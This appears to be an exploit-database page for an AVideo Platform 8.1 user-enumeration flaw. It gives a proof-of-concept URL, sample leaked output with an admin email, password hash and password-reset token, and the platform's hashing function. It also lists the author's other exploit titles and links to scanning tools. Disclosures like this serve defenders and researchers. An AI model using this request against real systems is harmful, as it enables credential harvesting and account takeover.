Search for hundreds of thousands of exploits

"AVideo Platform 8.1 - Information Disclosure (User Enumeration)"

Author

Exploit author

"Ihsan Sencan"

Platform

Exploit platform

json

Release date

Exploit published date

2020-02-05

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Exploit Title: AVideo Platform 8.1 - Information Disclosure (User Enumeration)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
# 
................
0	
id	92
user	"admin"
name	"Watch Later"
email	"user@localhost"
password	"bc79a173cc20f0897db1c5b004588db9"
created	"2019-05-16 21:42:42"
modified	"2019-05-16 21:42:42"
isAdmin	1
status	"watch_later"
photoURL	"videos/userPhoto/photo1.png"
lastLogin	"2020-02-03 08:11:08"
recoverPass	"0ce70c7b006c78552fee993adeaafadf"
................
# 
# Hash function to be converted ....
# 
function encryptPassword($password, $noSalt = false) {
    global $advancedCustom, $global, $advancedCustomUser;
    if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
        $password .= $global['salt'];
    }

    return md5(hash("whirlpool", sha1($password)));
}
#
Release DateTitleTypePlatformAuthor
2020-02-07"QuickDate 1.3.2 - SQL Injection"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - 'user_email' SQL Injection"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Remote Code Execution"webappsphp"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)"webappsjson"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Information Disclosure (User Enumeration)"webappsjson"Ihsan Sencan"
2019-01-28"Teameyo Project Management System 1.0 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-28"Mess Management System 1.0 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-25"GreenCMS 2.x - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-25"GreenCMS 2.x - Arbitrary File Download"webappsphp"Ihsan Sencan"
2019-01-24"Joomla! Component JHotelReservation 6.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"SimplePress CMS 1.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"Joomla! Component J-CruisePortal 6.0.4 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vBizz 1.0.7 - Remote Code Execution"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vWishlist 1.0.1 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vReview 1.9.11 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vRestaurant 1.9.4 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vBizz 1.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component VMap 1.9.6 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-22"Joomla! Component Easy Shop 1.2.3 - Local File Inclusion"webappsphp"Ihsan Sencan"
2019-01-21"Coman 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"Reservic 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"PHP Dashboards NEW 5.8 - Local File Inclusion"webappsphp"Ihsan Sencan"
2019-01-21"MoneyFlux 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"Kepler Wallpaper Script 1.1 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"PHP Dashboards NEW 5.8 - 'dashID' SQL Injection"webappsphp"Ihsan Sencan"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47997/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.